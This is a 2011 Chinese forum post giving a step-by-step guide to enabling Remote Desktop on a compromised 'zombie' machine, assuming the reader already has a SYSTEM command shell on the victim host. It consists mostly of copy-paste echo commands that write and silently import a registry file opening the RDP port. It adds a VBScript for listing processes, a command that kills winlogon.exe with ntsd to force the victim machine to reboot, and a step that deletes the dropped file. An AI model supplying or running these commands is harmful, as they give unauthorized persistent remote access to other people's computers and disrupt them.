鱼C论坛

 找回密码
 立即注册
查看: 2821|回复: 1

开启肉鸡终端全攻略

[复制链接]
发表于 2011-10-19 22:30:23 | 显示全部楼层 |阅读模式

马上注册,结交更多好友,享用更多功能^_^

您需要 登录 才可以下载或查看,没有账号?立即注册

x
今天介绍的这种开终端的方法,绿色,环保,无污染~~   不须上传任何文件开启终端的方法适合win2k,xp,2003.
  本文前提是已经通过某种方法得到了对方的一个SYSTEM权限的CMDSHELL~~
  在无须传任何文件的情况下开启终端服务。
  一、win 2k下终端开启终端
  首先用ECHO写一个3389.reg文件,然后导入到注册表,echo代码如下:
  echo Windows Registry Editor Version 5.00 >>3389.reg
 echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
  echo "Enabled"="0" >>3389.reg
  echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>3389.reg
  echo "ShutdownWithoutLogon"="0" >>3389.reg
  echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>3389.reg
  echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
  echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>3389.reg
  echo "TSEnabled"=dword:00000001 >>3389.reg
  echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
  echo "Start"=dword:00000002 >>3389.reg
  echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>3389.reg
  echo "Start"=dword:00000002 >>3389.reg
  echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
  echo "Hotkey"="1" >>3389.reg
  echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>3389.reg
  echo "PortNumber"=dword:00000D3D >>3389.reg
  echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>3389.reg
  echo "PortNumber"=dword:00000D3D >>3389.reg
  把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
  (如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
  因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效。
  一个简单的办法就是用ntsd.exe(win 2k以上自带的命令)结束一个重要的进程就可以实现机器重启了!!
  比如结束winlogon.exe,lsass.exe也可以但结束后会跳出重启倒计时(不太好~)
  winlogon.exe被关闭后机器立刻强制重启了
  命令执行格式为ntsd -c q -p PID
那如何知道winlogon.exe的PID进程号呢~


  以下这个脚本可以列举当前所有进程的PID:
  wscript.echo "PID  ProcessName"
  for each ps in getobject("winmgmts:\\.\root\cimv2:win32_process").instances_
  wscript.echo ps.handle&vbtab&ps.name
  next
  在CMDSHELL窗口下贴上如下ECHO代码就可以得到查看进程PID的脚本1.vbe:
  echo wscript.echo "PID  ProcessName">>1.vbe
  echo for each ps in getobject("winmgmts:\\.\root\cimv2:win32_process").instances_ >>1.vbe
  echo wscript.echo ps.handle^&vbtab^&ps.name>>1.vbe
  echo next>>1.vbe
  生成1.vbe后请检查一下echo出来的脚本是否有错(才四行,对一下上面给出的就可以了)。
  运行1.vbe得到如下运行结果:
  C:\WINNT\system32>cscript 1.vbe
  cscript 1.vbe
  Microsoft (R) Windows 脚本宿主版本 5.1 for Windows
  版权所有(C) Microsoft Corporation 1996-1999. All rights reserved.
  PID  ProcessName
  0   System Idle Process
  8   System
  152  smss.exe
  180  csrss.exe
  200  winlogon.exe
  228  services.exe
  240  lsass.exe
  424  svchost.exe
  472  spoolsv.exe
  512  msdtc.exe 616  svchost.exe

  628  KAVSvc.EXE
  660  llssrv.exe
  692  nvsvc32.exe
  728  regsvc.exe
  748  MSTask.exe
  776  alter.exe

  900  svchost.exe

  916  WinMgmt.exe

  1088  Dfssvc.exe

  484  Explorer.EXE

  1444  mdm.exe

  1340  Server.exe

  1224  ibguard.exe

  1252  KAVSvcUI.EXE

  1256  ibserver.exe

  1336  internat.exe

  1204  Uspds.exe

  720  bar.exe

  1288  dllhost.exe

  1580  inetinfo.exe

  1672  cmd.exe

  1464  pppoe.exe

  1704  regedit.exe

  316  cscript.exe

  从上面可以看出当前winlogon.exe的PID号为200运行命令ntsd -c q -p 200 (这里的200要替换为winlogon.exe进程对就的PID啦)过会儿机器马

  上重启了(ntsd.exe是WIN自带的可用来结束任意级别进程)等着收获吧~~

  二、winxp和win2003终端开启

  开启的REG文件代码如下:

  Windows Registry Editor Version 5.00

  [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]

  "fDenyTSConnections"=dword:00000000

  [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]

  "PortNumber"=dword:00000D3D

  [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]

  "PortNumber"=dword:00000D3D

  用以下ECHO代码写一个REG文件:

  echo Windows Registry Editor Version 5.00>>3389.reg

  echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.reg

  echo "fDenyTSConnections"=dword:00000000>>3389.reg

  echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg

  echo "PortNumber"=dword:00000d3d>>3389.reg

  echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.reg

  echo "PortNumber"=dword:00000d3d>>3389.reg

  regedit /s 3389.reg

  del 3389.reg

  这样xp和2003开启终端是不用重启的如果你想改端口只需把上面的两个PortNumber对应的D3D改成相应十进制数的十六进制形式就可以了!用计算器转换吧。XP下不论开终端还是改终端端口都不需重启,真是太妙了~~呵呵。如果要关闭终闭只需把"fDenyTSConnections"=dword:00000000

  改成"fDenyTSConnections"=dword:00000001


评分

参与人数 1鱼币 +2 收起 理由
乐め乐 + 2

查看全部评分

想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
发表于 2011-10-20 22:27:41 | 显示全部楼层
好东西啊啊,太妙了~
想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|手机版|Archiver|鱼C工作室 ( 粤ICP备18085999号-1 | 粤公网安备 44051102000585号)

GMT+8, 2024-3-29 17:03

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表